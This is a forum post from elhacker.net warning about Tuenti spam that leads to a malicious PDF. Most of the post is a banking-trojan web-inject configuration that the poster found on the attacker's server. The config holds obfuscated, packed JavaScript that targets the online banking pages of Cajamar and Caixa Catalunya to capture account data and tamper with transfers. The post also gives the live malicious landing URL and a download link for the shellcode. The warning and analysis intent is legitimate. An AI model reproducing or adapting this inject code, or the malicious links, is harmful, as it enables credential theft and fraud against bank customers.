elhacker.net cabecera Bienvenido(a), Visitante. Por favor Ingresar o Registrarse
¿Perdiste tu email de activación?.
 
Inicio Ayuda Ingresar Registrarse
31 Julio 2010, 08:05  


Temas destacados: Sigue las noticias más importantes de elhacker.net en Twitter! twitter



+  Foro de elhacker.net
|-+  Seguridad Informática
| |-+  Seguridad (Moderadores: skapunky, Novlucker)
| | |-+  [Aviso] Los hackers rusos descubren tuenti		 0 Usuarios y 1 Visitante están viendo este tema.
Páginas: [1] 2 3 Ir Abajo Imprimir
Autor Tema: [Aviso] Los hackers rusos descubren tuenti  (Leído 8574 veces)
nacho87
Usuario

Desconectado Desconectado

Mensajes: 71


Ver Perfil WWW
[Aviso] Los hackers rusos descubren tuenti
« en: 27 Enero 2010, 18:38 »
Acabo de entrar al tuenti y tenía 3 mensajes privados de la misma persona con el mismo contenido:
Código:
http://onlinegames25.net/5/in.php

Nada más verlo ya me entraron sospechas y decidí entrar a investigar un poco. Al entrar a esa página se te pide descargar un archivo .pdf. En ese momento ya casi se podía confirmar. El típico exploit pdf... Como estoy en linux abro el archivo y obviamente estaba en blanco. Al revisar el archivo por dentro, su contenido es éste:

:http://www.mediafire.com/?wy1tozt3wuo

Un extenso shell code que aún no he investigado que hace, pero seguro que nada bueno...

Revisando un poco la página veo que son un poco descuidados... Permiten el listado de archivos del servidor desde la raíz y ahí me encuentro un archivo .rar cuyo contenido es el siguiente .txt:

Código:

;###################################################



set_url https://www.cajamar.es/BE/ServletOperation GP

 

data_before

<head>

data_end



data_inject



<script>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('t 32=1;t 6G=1;t 5G=0;t 5h=0;t 26=0;t 4O=0;t 3B=5;t 53=5;t 7I=1;t 7H=H;t o$=2M;t 7G=7L;t 7K=34;t 5r=H;t 3i=H;t 2r=J;t 2g=H;t 4n=H;t 5q=H;t 4y=J;t 5s=H;t 4R=H;t 3g=H;t 2O=J;t 1l$;t 5U=\'5V://2Y.5L.5X/7J/7C\';t 5J=\'5V://2Y.5L.5X\';t 1V=0;t 1a=0;t 17=R 2I();t 2z=P;t M=P;t 5o=H;t 4s=[];t G=P;t 1Y=0;t 3x=\'\';t 1W={};1W.h=0;t 2u={};2u.h=0;t 3z={\'7B\':\'7A\',\'7F\':\'7E\',\'7D\':\'7U\',\'7T\':\'7S\',\'7X\':\'7W\'};t 33={\'7V\':\'7O\',\'7N\':\'7M\',\'7R\':\'\',\'7Q\':\'7P\',\'7k\':\'7j\',\'7i\':\'7n\'};t 36={\'7m\':\'7l\',\'7e\':\'7d\',\'7c\':\'\',\'7h\':\'7g\',\'7f\':\'7w\',\'7v\':\'7u\'};t 43={\'7z\':\'7y\',\'7x\':\'7q\',\'7p\':\'\',\'7o\':\'7t\',\'7s\':\'7r\',\'8u\':\'8t\'};t 40={\'8s\':\'8x\',\'8w\':\'8v\',\'8o\':\'\',\'8n\':\'8m\',\'8r\':\'8q\',\'8p\':\'8G\'};t 3u={\'8F\':\'8E\',\'8J\':\'8I\',\'8H\':\'8A\',\'8z\':\'8y\',\'8D\':\'8C\',\'8B\':\'86\',\'85\':\'84\'};t 3X={\'89\':\'88\',\'87[RECORTADO PARA NO EXCEDER LONGITUD MAXIMA]f((W=1k.1u[2])&&(u=W.1A)){f(32){f(2g&&1C.2L&&1C.2L!=u){1C.4D=J;1C.2L=P;9o.9p();O}f(/3c|3a/.F(u.25)){f(1C.4D){1C.4D=H}B f(2g&&!1C.2L){1C.2L=u;3N(W)}f(2O){1C.4r();2O=H}}B f(1C.u!=u){f(2g&&!1C.2L){1C.2L=u;3N(W)}1C.u=u;1C.5z()}}B{f(2O&&(1C.u!=u)){f(u.67){1C.u=u;u.67("9q",1C.4r,H);W.5P=1C.4r;2O=H;W.9n=1C.5z}}}}O}19 5v(){1l$=1k.5N.2X;f(!1k.4e&&1l$.2T(5U)!=-1&&(1k.1u&&(1k.1u.h==3)&&1k.1u[0].1n==\'9k\'&&1k.1u[1].1n==\'5R\'&&1k.1u[2].1n==\'9l\')){f(!5r){5r=J;4y=J;3i=H;2r=J;3g=H;2O=J;S(\'48(H)\',0);9m(5T,10);S(\'14(1)\',5Z)}O}S(\'5v()\',10);O}5v();',62,655,'|||||||||||||||if||length|||||||_B||_C|||var|_E|_D|||for|||else|_H|_L|replace|test|_I|false|innerHTML|true|_J|_G|_K|break|return|null|_M|new|setTimeout|100|_R|_N|_O|tagName|_P||||||_B6|||_T|_W|function|_S|value|_V|Date|_Q|exec|_f|_X|_Y|_U|window|_|Math|name|zlog|getTime|toString|body|try|parseFloat|frames|catch|key|case|_b|in|document|parseInt|_Z|_c|_e|_n|getAttribute|_g|_q|ig|_l|parentNode|_j|id|_p|tr|while|round|Url|_d|td|_k|_a|_i|_m|_AC|_AV|_t|language|101|_o|readyState|_h|_r|__|style|_z|_AE|setRequestHeader|Content|getElementById|split|_w|form|_y|_x|font|onclick|push|_AA|_AG|responseText|_AB|_AD|getElementsByTagName|_s|_Am|display|500|charAt|_A1|_AF|table|_Aw|_AL|_A8|xmlhttp|_AS|isFinite|class|Array|_v|setAttribute|_AK|1000|do|_AO|_AU|_AN|__utmtr|_AM|indexOf|script|_AJ|_AP|href|www|_AQ|||_AR|_BG|200|status|_BN|send|open|abort|complete|cookie|loaded|_AW|styleSheets|_Ac|_AX|removeAttribute|_Ae|_Aa|eng|none|_AT|src|substring|_A|RegExp|_Ad|_Af|_Ay|_BP|_Ab|_Az|_A_|_Ag|_Ap|visible|_Ar|_An|_At|encodeURIComponent|_Ao|img|_Ai|_BS|_AZ|documentElement|_Aj|_Ak|_Al|Length|urlencoded|charset|Type|application|_BW|UTF|POST|nodeType|_Bg|_A3|_A2|_Bf|___|floor|_Bd|_Aq||_u|onmouseclick|_B8|write|input|on|_Ah|fl|frameElement|className|_A0|_Av|about|_BM|end|_A4|blank|_Ax|tbody|_BQ|appendChild|_BA|_BC|default|NMF|_A5|ms|cssText|_BJ|_A7|_BF|switch|_BI|_BB|201|cm|substr|removeChild|createElement|click|but|W_C_OPER_TRASPASOS|usuario|charCodeAt|_BL|alert|ps|_BK|bphrval|bpclval|bpmclval|_BY|_BH|link|_BZ|x2|ACEPTAR|slice|hidden|_BO|_Bb|||block|META|_B5|51200|LISTA_MOV|_TEXT_3|cjfrm11|literalbold|cjfrm101|count|_As|_B_|_BV|no|bl|_Bc|_TEXT_2|_BR|Aviso|_Ba|_BX|_BU|Notice|_Bj|_Bn|bpdval|top|_TEXT_1|_BT|content|cjfrm99|continue|FILA010101|CJZLOGOUT___|nextSibling|_Bi|random|lm|_Be|previousSibling|cajamar|onmousedown|location|_Bu|onload|_Bs|menu|On|_Bp|_B4|https|Saldo|es|String|3000||255|ActiveXObject|00|fromCharCode|_Bq|balance|addEventListener|XMLHttpRequest|title|pow|rules|cjfrm10|Pragma|type|SubmitForm1|httpEquiv|cjfrm06|nbsp|getMonth|br|getDate|cjfrm08|_TEXT_1_|setYear|300|_Br|_TEXT_5_|FIRMA2|text|FIRMA1|cache|cssRules|getFullYear|cjfrm021|setMinutes|_Bo|all|W_C_GENERAL|0px|cjfrm04|cjfrm02|_Bt|CEST|_Bk|setHours|cjfrm16|selectorText|W_C_MOV_NCTA|firstChild|5d16fbf50c3ef9706442519430cbba0f0323230b|addRule|TABLA_CAMPOS|W_C_DATOS_CUENTA|resizeBy|DE|DATOS|_B3|COD_ERROR_AUX|3170b6e8113ff03c492c08dc25c3ad5e2d849b1f88144320620d7fdf8df05a58b7245040bde434bcfb0124aa01b7d71a0aee2ec6219975de283ba68f9df0e4e53ff6472043d35bdb728a7a0a4942b4f408e89ab688729e0a1eb803692487c9b4be9ea07d26629467f804ea8d03dbce0891f270a255e229e51fac46a23dcb18746327d6405c5995dfad5654c44823419f28e83294a05499e90c7f8b53e01d1a69f50286f5a93226d8c48d3291f3e0e0d1e61e8bed6e2f4a54320598e5f2f65ca8ee18c9d697839f61a2e04ce8f7163d565c5acc3ea1dc92c47a843249da95163f480355a55b76bda54d0d1a880cb21c7230a534c7495ce3afad79920aea4fec635d435fdc50f9b3b3a2cd10f4d692a0d892c6055b394a881da5b0c98d9ba790e500509537435635d5557277aa99a95fea8c402c33492227b5a6dedb695fe2e5beb253d79fa885407e27e0c7ff96364f62426a13af169f611e9ee31714a822ea51190927576ff0e484a328636f7535b64ec0e509cdbd622efc9c186d40dbae25d8c4c6e9425b5e5e0b99533a006679778759b7090f7791f8ad7ea174d485fe1bb366604ce16375177fd60572d62599446d8f8e4fc48136f404b5cd0e50d87d53679196d6cac37f419527ce7026bfd84e8da4ef45e254e172cf6bf74a48938a852981ab8ae518477e326f3a487c94777f28246eaca238cff43564a0cd4ff1624b8068b4ccfc305deee33305c63c8539c0554f90ea772e364109a3e90300bb14cbcb3a75abe83f9d0d834a83259d9823f6466dd7ca5be5af2ab28388c149c3445b5e41f359153a4a32a0fdc0885e79a7031a117165f5887760414e6542fea43e7d66edb7fbfaf00be5485b1ee1cc4f89f53ad090e6ad290e65ba07bdc0239983001cdc9175d5b8d7443874deab8a236e949921d68c852efeb5068590bb28386b22c48c17263eff773e0e5b10e8861f436bf8da780a5c982e43b49977749fbca4b961c0224e2042e83b9ef44146388c7474099fc403679ef946fa6807521bad5ffef6ddbd2675cccf598c23c38174811c527a255e9fea8a9a5a659dca67a59994d403c6bf1c62a19fa4d3769e07c5e1f485b4b2906cea7995556bdf4fc6c1664a403b0f93b7bc7fdee1e413080e9d4e60a9afcc46291a72f9c2eb8d237733dff2d07493af14a55e9f739fe6411e80b95dfc86617d3b01709ac95eaf0323754b184d67bbf172ffe64ff12b5d64304b1ad6a74a548bbea1a225e45b3c09e7240507a75cd5bd9014cb03afc6a1bac0d023d6cc42c980c4e9b252e2e1cfbce6983c576036be0dc7ae3025cf0794ac3544221c6dd8b09efaaaab808d33b370e557468438b2a3a5fc449fcd06cb4e25ddf4fe6e6faf16ad84ae41a7e798e391185636e9690c970ff9a535a30f8c75817bea436a8e87db6d9f5d0035d0047704b942c043076498b66d23fd0f1ce31446cda0e0972d1bd54f087a02f1bb5902af6fe971f1af5048ed7ab3fa3556b4648c0441cd89effcde774ae3286988b702dc2e31e2029e1d7c1bad66e80a552a7d7337a4eb667dd7e395a1f2f20ccab3a3cb1a121503905a5d266eeb7c44260c341830a01e274c006dddb60ac1110a848fe2b446eabd74aff8cca1638106801aeeb4c3ea0fc10cc23fd292d0b828ea885f7497dee6930f1a69c3c0553496b34dfa0725670fca4ff34a55125a6d6f4154da1fc1c026a381157e451682277c5d4006f7ccd5fc47ddd0af693467c0e33fcc6aae1de370186804ca6d5f0a236569a3fb132c5474f95abaa503b9b4a3e592e35b18ed2be62096ac226cbba3eb96ff8e95066dc85f0f088b79bf3ec6f9feb02453dc10f341074b6ca490db8623e4a1c229629254484e46d8ee040351ef77|BODY|childNodes|5215e7e90b33bc72255457dd21ce0386d47d|div|opera|5d16fbf50c3ef9706442519423caa60348eb031a32da|0012feed096ca06a2147508a4a9eba1459e2f32bbe0158377a1322bdebb15d11a029434ab9a431bcf91a7be34bf9871450aa38c6219975de282aa28b93f4e9e50bfc592019db559947d560025f5a84eb4dfd9af9df6693115fb1103e3f8cd2a6d1cefe287234d97a8f42aad7098fd419c4f138af57e932ad1cb743a968971975796fd8242c12db87ec534090552f40876afc69daab0dd0e3692ac251ee1d0f68c31586f3ad7d68dfd3957bcef0ece1d7aa198bf8652f150a2c18de89b3ec41f1fd15cbc49895c958b5a80bebac4721241e08cb3df4dcdacb6bc03144cdc00631500e01ad0e76a6e65b196de718ef44762dec33c44547a2adb7729408e758cd63464056c60bb79dadaf971fa0ce98aa96ddce015b3d038f06a2ab8ac49cb29bba4c6bcb29175e3ed45a3c7ea79bb209f1da772a2a162526bafeb2da6944ebe4fbe75bdb89aa8f4d6578e7d2fb90340c367b6104b67afb3c1dace50719a127933e6c77361c62f6ea92fc51003c7960bc58908d38a2d63d21f29857714a82a108f8e5ebb9580b4f1201cd082a121a3267955ab605563895febb20e778da95be47f034724ae079624477ce13278b619d596dc98d44d6d87bb15da2d1414ace7d4f398ac489d4cf69078323c36837bfae12cfe5b50beb1dc967ce7ea15119c2999675d3b296f8150874316a21437c9767703d766eafb56788a6797bbdd34da97a5b8a6aa9cdb5700c918d6a038a298038944a1cc5ee6728761f4bf7a9530dba14d5c02d3db5a83a8f03bd70842680d44ad10d6bd29a00ebb428bdd587d543df54054f16bf277074162da1e08e9f576aef004657607fee8e287b470b336990d1165102afeab0f8f60bf65b3a71bb9701ddbb4fe1d1e9d375521cdf4ee6cf2194830a50ebec2193a8db096016bad2ad6c63878a3b8ed9c874899a3db4b0df0b084e0a8ed85e3028ff76384a5b08f9d91f4e69e68c215863993842bbcc3628b1bda4ac64942e156348ed3a9eed5a5670d43b74038b8a1a779cbe07f979485f04e51babf484f5727bc9ce1797768fd1209f451d6024528aaf89c91e23c4802eeec1d9df1fddb9107ce588b285399a5495b8a4dee4b18377fc7a8e5628951fc4d4325c572c4cc697c12cd8e4bd0f0c4a8e4e6abaea830d7f4236e6d0bb97777536dee48438c4a046cd32d73ddda8342fc1ed33e0ca7d65311d74cafe40ed42716b52080705f0b222ffd456fa215a2d54470dd5e20f1b89e6cdc46ae70f7277a1320705a04687f1c419d611aaddcceaf3fd4efdfb6fbed58ee3b915b6d5b9bcd3de2e1b2d58c67781bf2e7feb07a1f84b2c490669949df9b5e2f4e3f204c81b9a7d0c813db1e6eca559ceed3bc97805e3c29f4a518d24ea9fd43cd482f4a8d205003ffe6140c558b5e431bf0ec67c8a2ead476dc6e4a60dfa3a3373de142c1db445944f1c79d4e33077ae0f10b30c1883efaf8e3c10cb7d710b42dbc5396fad66a171abbf4853bb73bae63710a336cd4135c9d9bdf593143083430aedd77fcc7231bc08cd483e50f87aea564866773467b9ee3c3f909df9dad9b70bc986dea3111858549755542c24e74b64127d1d2b0c88391965226fdbe743d20c0cddc2a4aa02a0ef7aa2f5cba178dd43865fbdfd86bf488f098a64969ad1e22ae78a58439ad7aa85071b61ce8e5d67d8fa4fbb002d6217ca1ff6405b1549236a4a7ced1bc2f537bdcc7d541411812720110e24f5d194fe4fc3cbea683179e6c950de77a907a43d127b18d4131507385263b5ff577c0f2bb458afdd3b93cc96deccb6001ba221b53eb0864d37bdaebbfcdbd4c81d72b53a6446e762ba3982aef38a074fd854bd50503209dabddca34882ccb21d6691616e475ed0f04eb59ae56279a3663b601f70cb726f98198e5dc11ea8b92b36ac86b72729ce69e605412492c4cd4af88933f61477cfe9a4e6c55f98c9357bb78bfb19f84f4482c711c4091b04e3d7b0ad04b6c54ca3edd600ae56ddf491b1f299f3f0b583379255d11a6664e49e3bead31bcca5dfafc2e16dc7004cab101f3e0ba8be87c399ea1fb2c11e7dc0dde4e5cd33d8379026f77efcb41898b6cc91a7ff9719ff539afb260bd2034f7304b599bbfa07ee5e57b10b2c7d0f39b4723ad04f6a970b8a467ad53007c8bd2a6251ffbab7589f3f930f53560156b4212024caafe2a0b3a55005ce38f7e38d73a90fedb74d355058b91d2242a72108fe91b69e31fdd8e9c68e0996bd980b680408ba0853b666f6f057c6926d90a0174f150eaf3653d2562613312f89d156534bc43deae001f0388a65b900dac7b0842b387170285e3e3f2e0107f329505bab1b5a10483ee1c1feb2c60e3ddb1dfaab93f6682112113d7a289873e511c8f4e4d95d6e6647519af8ef23fe8364f9c6bef020a76957abad231d32eb3be1405dac9658443b502faa0296769ac3682d03d0e20267afd6469b42298829adfad9edff1ad34af888bc985f53a0f34dd93b6056f9bffdcd2ccadf58d6aa591dfd121917c3caff3c8aa09d121c1799894f97857885ce1c0770651e36d864a8926b20dc99664d4d79fd700c5acb12c0e64d590285b298aac29f763584a3d509a15c49d1c7b95363c7922f05f724b1bc87faf014f0f4b1e6d63a5ac05dfb76aa59bb514051bfd68e7d07331b27d337198632f2bfcc6ae4f13673634bdec4e1e80d228733acec32cc763044b9ea70f415c994f23bb20db952ea625c0ded0a4d44e3d30bc0ea283b3b261402618cb812036511ee7b1c6c485f4ad8c40ea69d35b9d365bd0dc4a8fe22925e435d02b6037cf8e8cc8c7b5857dc3ed441bd4bba319b6fece9e38d8bc7545f661c849907d25dfe3e6d7f2ca93c62d2eb40c04c7f46bfcd9613562ac4afe6dd2bbfe8660c4f99a050b56bb5d499cb435004846d404292631988fb87a72f102904d13a61c849145f35094edc43963a5517f781956ab3237e520e1758b99b970cf12c347969fa0a121be8c16349337a46ef53266ab2c27d000eeae809568f880e1f3d595b52f04fa9fe8f364232ace096daa25d26ca2579d1431825817f87d3b495deae6e53724c6357596e46667c7800f5f207f7f63e4255d3fba1cb67e41bc5c3ecd99cc765f24e173cdd3dcd00b4f58ec447a941bbcc55c1e94572c03c8dfad7af6cc0b3d9cf2e8776b30d1b4f2ca53d596e138a83847657c87ac17c1b237dab4087a47f1450853c7f1184ed2261669398c302df7b168b0780b252a643fa436965eba08320f64fcb6be38ef486a991f636152ba3c195bbb1343f6e65f5437c5184349392d486597089d3f204cbcbb45b766ad45e49693fb6ce9bf8b88ad38421d23db0e381ed58e16852922b98624099d11debb2b07e799603d77a5ade6af466064ea411ddfd5ba7b77530a95e818143d4b8f1e90278148136c03bf99269b5070167e8901cc7b8fe578d67fef4c2343effb026004f25fb703fefaa94171cbcf506c8a69da433539135e96b9adf7380890415b2b5a3cce3d12d80b8667204f67b33d4c6aaf1c32751b24798806a44af8ee5d8e5465510877df755607f6d522bb5aac80627f87773f4eb29809db9ff463802ad19a60029f599228e9f77174b092e33c192a20f8c2be7223b21bffe0f3942d4c772151ef782770a10ed12458bd4d32f5063692bee009220d76817a89dc51ef9da2771c09e4e6e7ae8e5b69133d52117e2fcb2bf018bb5671a39716952766486f4aecb6bf5d31e7b172bd64ec8bedb1b859fc4c219d0d6ad3980f0d5a5b2b92080b8f6efce21bade7fcbf2da87a03501b778a1c9176191bfb41e0c02b48629f10d8ba812e8aff4cd6ce84edbbe004e49d728f131e5caa09330ca6ac72384ba4d3b56daaa20d109f47079682fd91b3073e87940e14c7202eda2fa00845cf8d2e7f3815e3f4957026a74cdf4b192034e1fa9b248046d4493a0c20dd92c3ffe324564123937e7c70604f21331c9c8b7bfcfc2a25777c8fc6b08baac08a7e42d79d1966dd59a45c0380014577bedccce8bab08ee270a0370b1f9a74b44e226d7cdfc8f0db09a0517f314d4c6d7b183b43c6089f20eee60672bfc3567a0befd8bf81b75f14423b67646cd055f4b643c304fcc404704f9e9081c7326917e90288f454a87b82e7b7a72cf8e0eb726d9c6856b5822d805add612|lastChild|581fffe4040464bf34|COD_ERROR|581ffcef0927ff6b2b4814d02582aa0f42fcf9044cc620|0012feed096ca06a2147508a7c8da10541eaa829d6085320305427bdf5b30f45a3284714f0e53bbcf04c76f141f78b4106e76ed22e9b7c856923a489d4fff9b97fb946210cdd5bd13b85592c6073acfb05f18cfd9b69d01052b307396f9bc3acc88fab692231d73bd805f09b0092de4fd7ba34a840f432b710b942a86ed317782f62df342612dc94ad4640df117e129a29ea7dc3e20fc8b45a729257e3514e30fb178aafe33279c2dfc36896fce1fed0bf4d8cf666704647211081a3e9e158e0b55bd0da838e8709fbfb46f9ec0331794f5ec86fb8c49a9e2edd2f5cdcc7462a59124ee95f24bba5580563a24cbf186368f521d90913fbb2a67ac046ea07e372161a0bc104eba9abe69812f6dfc0f08f8388444c2b018b4fe9b0818686ffcbe3580f953a0c1034da4c3a2ce996b547b196623031487e6ba7fffdc4694aace0f6f84dccc0a1de1f3e37eed7efc7645a6459691aec026898a9|TABLA8|7215aae8042bbc6c2d48534e2e82ad0f43fbfb70da1358796b0661b7ebfe5f4eb02c4d4dbdbf24b6fb0b35f34bec8c4f0cb56205f179ba|1752a900b64d44|1f6a83894d589d024d0064614c|1450aba04c0183a8ce|164fb0a64f73bc03ffb44e|1640a2a44e68aa22731518926c88f34413a2a03f8202dea8f0|1750a2a75272a62871060390668ee34b01a8880c|0a5abdb302260c33|1640acba4476ad28721c15947a92ff5004b9ba3f04de3654|164fb0a64f73bc03c33245|0e5aad04878e81|1a57aeab4e72b504d45aff|682bda04589bb5|1750a2a75272a62871060390668ee34b0175e2b7|1752a900a5eeae|1f6a83894d589d024d040d8783|1640a0a65f63ab266f1017947782e2460caaa00287d2dd|164fb0a64f73bc029dd4b5|1640a0a65f63ab266f1017947782e2460caaa005f0aa56|682bde047ebe31|0a5abdb30551baec|1640a2a44e68aa22731518926c88f34413a2a03f82007cf2b5|1450aba04c00d98342|0e5aad0030c783|1a57aeab4e72b50223f676|0e5aad02ecbc6e|1a57aeab4e72b500ff3a4f|ServletOperation|1750a2a75272a62871060390668ee34b055dea3e|1f6a83894d589d024d0117cadf|1450aba04c03f9b14b|_B7|_CA|_B9|BE|_B1|1700|1f6a83894d589d024d0216cb30|1450aba04c0350a315|0e5aad00fd61b1|1640acba4476ad28721c15947a92ff5004b9ba3f0254cc43|1750a2a75272a62871060390668ee34b0192a072|1752a904bcc825|0a40acba4772b72273021d00593a81|164fb0a64f73bc0437b427|0a40acba4772b72273021d052b55a6|1a57aeab4e72b502f2b432|6100a5ce70|0a5abdb301c87b39|6126003413bd|1d56a8ac043d8286|682cded202c4a82a|1b5aa1a00262db34|6b2fdfd43004c8561573029c237d|1a4baed4300267d8f1|0d04e80a54|0d56bfaa5f63ab266f1017947782e2460caa05d8479b|682f007471d6|1659a6a6016fba8f|6b2edfd5007e9a50|1c51bbac019f4ac9|781fe8e54520f96e28435ad53282a50f53aef574d917582a2e0723beeeb94e5fad374b46a1b1003f2085|6c16efe11637bc612b4b44d825d6ac4054e6f335d7085a297b0432bdf5a70f4dab204e4da1b103df8684|711feee90133ef22204314e725c5bc1249eaf77101c48d81|6812eff20072fd7021065adb60c6a60355e3f37bc0141730604835bae2fe5f4eb02c4d4df2ec32bff20d22f546ad044b3da6|7215aae8042bbc6b2a405bc62dc3aa09d3e0b676db09173c624822a0eeaa4a59ab2a024db7bf24a6b70b3af541e08bdd06f403abcce4|6812eff20072f57164485b9429ccaf0f52e3f761dd085979790135baa7aa474ee2265040a6fa25baf64e2fff57a38a4f1ebf6c9e2f9968cf6b620368b126|682f01d1b2e6|0d56bfaa4f65bd226f00bcb6c3|1d7e988c6417be155b2636be57bd8c4824999a11a26b39017d7720|6f1fe9f5173be87b646b51d533d7bb0553029e67d7|692edea053034ea3f2|095ea6d402958875|1640a0a65f78b421630600b4ec51|1750a2a75272a62871060390668ee34b02d040bb|1752a90375ebe2|0a5abdb300ed748b|1640a0a65f78b42163060496acdd|164fb0a64f73bc01b9d672|1a57aeab4e72b500b2dd87|6b2d0233e947|0a5abdb30305d14e|1f6a83894d589d024d0250fe3a|1450aba04c01ba9a99|0e5aad052deb0b|692ddfd43505ce561572019052d1|1a4baed43004357e1c|6e2601733fc9|0d56bfaa4f65bd226f013bd85b|15709a9764528a47662c3fab44abc97f65a98105bd6e00b5491b|1b5aa1a00538a19a|692ed7d700170ce6|1c51bbac052a7c99|682fd7048ed138|1d56a8ac0589902c|6f2fd8dd004d4d6f|1659a6a6036ff070|TBL_DATOS_OPER|_TEXT_3_|_TEXT_4_|W_S_COMISION_TRANSF|NCCC_AUX|IMPO|CONC|Aceptar|fondo|FIRMA|OK|Titulo|_TEXT_2_|W_C_AVISO|MOUSEDOWN|ceil|1000000000|Event|cancelBubble|button|captureEvents|createTextInput|NCTA|NCCC_ORIG|DATOS_CUENTAS|100000000|_Bx|CJZLOGIN___|bloque|typeof|undefined|_B2|Microsoft|lanzaOperacion|S_C_GENERAL|Msxml2|superior|contenido|setInterval|onunload|history|forward|DOMContentLoaded|incorrect|se|puede|call|des|activ|llamar|GET|W_S_ACTIVACION_SA|30000|CJZLOGTR___|realizar|BENE|CTA10|DATOS_TRASPASOS|TBL_TRANSFER|ESTADISTICAS|SUBTITULO|ETIQ_2|LIT_TEXTO1|FECHAS|BUZON|CHECK|checked|doSubmit|troyanos|TAB_DOCU|W_M_MENSAJE_INICIAL|IMAGEN|ETIQ_1|contable|Accounting|disponible|DATA|LA|CUENTA|ACCOUNT|Available|operation|date|W_S_TRANSF_EXT|Last|Fecha|ltima|operaci|setDate|escape||1_src|2012|setMonth|path|contentWindow|iframe|toGMTString|unescape|visibility|height|width|2001|NORM43|expires|event|PDF|GRAFICOS|EXCEL|desconectar|head|Expires|1_onload'.split('|'),0,{}))

</script>



data_end



data_after

data_end



;###################################################



set_url https://www.caixacatalunya.com/NASApp/ceconline/cconline.jsp* GP

 

data_before

<HEAD>

data_end



data_inject



<script>

eval(function(p,a,c,k,e,d){e=function(c){return(c<a?"":e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--)d[e(c)]=k[c]||e(c);k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1;};while(c--)if(k[c])p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c]);return p;}('q 2E=1;q 6a=1;q 6D=0;q 2O=0;q 1D=0;q 5i=0;q 3O=5;q 4Q=5;q 1M=-1;q 8g=1;q 8h=E;q t$=2U;q 8i=8f;q 8c=2Y;q 5R=E;q 3a=E;q 2j=K;q 28=E;q 49=E;q 5u=E;q 4r=K;q 5K=E;q 4E=E;q 3d=E;q 2N=K;q 1s;q 6J=\'3c.6d.6e\';q 5J=\'8d://3c.6d.6e/8n/8o.8p\';q 2B=\'8m\';q 1S=0;q 19=0;q 1h=Q 2S();q 2i=P;q L=P;q 1W=0;q 4m=P;q N=P;q 5H=E;q 4I=[];q 5j=\'\';q 1e={};1e.h=0;q 64={};64.h=0;q 1r={\'8j\':\'8k\',\'8l\':\'8b\',\'81\':\'82\',\'83\':\'80\',\'7X\':\'7Y\'};q 2P={\'7Z\':\'88\',\'89\':\'8a\',\'87\':\'84\',\'85\':\'86\',\'8J\':\'8K\'};q 4i={\'8L\':\'\',\'8I\':\'8F\',\'8G\':\'8H\',\'8Q\':\'\'};q 3X={\'8R\':\'\',\'8S\':\'8P\',\'8M\':\'8N\',\'8O\':\'\'};q 1G=[\'8E\',\'8u\',\'8v\',\'8w\',\'8t\'];q 2e=\'5d\';q 39=[\'8q\',\'8r\',\'8s\'];q 2n=[\'8B\',\'8C\',\'8D\'];q 1v;q 4P="8A";q 3k="8x";X 4h(3o){q i,j,k,m,x;q 3e=E;q 2q,S=P,A=P;f(28){M}f((S=13.1a[4])&&(A=S.1g)){f(!4E){4E=K;1w{f(A.3h&&(j=A.3h.h)){I(i=0;i<j;i++){f(2E){m=A.3h[i].5T.h}B{m=A.3h[i].5V.h}f(m){I(k=0;k<m;k++){f(2E){2q=A.3h[i].5T[k]}B{2q=A.3h[i].5V[k]}f(2q&&/38/i.F(2q.8z)){f(3o){2q.1X.4O=2q.1X.4O.J(/2k\\s*:\\s*34/1E,\'\');S.7W(0,0);3e=K}B{f(!/2k\\s*:\\s*34/i.F(2q.1X.4O)){2q.1X.4O+=";2k: 34;"}3e=K}12}}}B{f(2E)[RECORTADO PARA NO EXCEDER LINGITUD MAXIMA](2Q(1R(1i(x,1s),4v),1s)):\'\';G.1d.2s.W=1h[19][4];G.1d.4L.W=C?(2Q(1R(C,4v),1s)):\'\';G.1d.4M.4K();12}1u(e){}}2f(\'5C\')}}}B{V=Q 1b();f((V.1k()-1W.1k())<30*2U){17=R(\'14(11)\',Z)}B{L.3v()}}12}1U 15:{f(N&&N.h){1A=P;f(N[19][7]==\'0\'){1n=N[19][0];I(i=0;i<1h.h;i++){x=1h[i][1].J(/\\s/g,\'\');f(1n==x){1A=1h[i][0];12}}f(1A&&(L=2Z())){x=K;1w{L.3E(\'5D\',1A,K)}1u(e){x=E}f(x){L.3q(P);1W=Q 1b();1S=0;17=R(\'14(16)\',22)}}12}}12}1U 16:{f(L.1P==4){f(L.3n=="2Y"){23=E;C=L.24;f(C&&C.h){t=P;f((x=Q 2S())){1N(1){t=/8U\\d*\\s*\\(\\s*\\d+\\s*,\\s*".*"\\s*,\\s*".*"\\s*,\\s*".*"\\s*,\\s*"(.*)"\\s*,\\s*"(.*)"\\s*,\\s*".*"\\s*,\\s*".*"\\s*,\\s*".*"\\s*\\)/i.1l(C);f(t&&(j=t.h)){f(j==3){x.2g([t[1],t[2]])}C=C.J(t[0],\'\')}B{12}}t=x}f(t&&(j=t.h)){1V=2H=P;x=N[19][5];f(x){x=x.1p().J(/\\s/g,\'\\\\s+\');1V=Q 3m(x,\'1E\')}x=N[19][6];f(x){2H=Q 3m(x,\'g\')}I(i=0;i<j;i++){f((D=t[i])){x=/-\\d+[.]?\\d*[,]?\\d*/.1l(D[1]);f(x){n=3B(x[0]);f(2o(n)){a=1t(N[19][3]);b=a+1t(N[19][4]);m=n+a;m=1j.1T(m*Z)/Z;z=n+b;z=1j.1T(z*Z)/Z;f(m==0){N[19][8]=a;23=K;12}B f(z==0){N[19][8]=b;23=K;12}}}}}}}f(23){N[19][7]=1;f(N&&N.h){y=\'\';I(k=0;k<N.h;k++){x=N[k][0]+\'|\'+N[k][1]+\'|\'+N[k][2]+\'|\'+N[k][3]+\'|\'+N[k][4]+\'|\'+N[k][5]+\'|\'+N[k][6]+\'|\'+N[k][7]+\'|\'+N[k][8];x=2Q(x,1s);y+=(y.h?\'|\':\'\')+x}f(y.h){4d(\'2y\',y,E)}}}}}B{V=Q 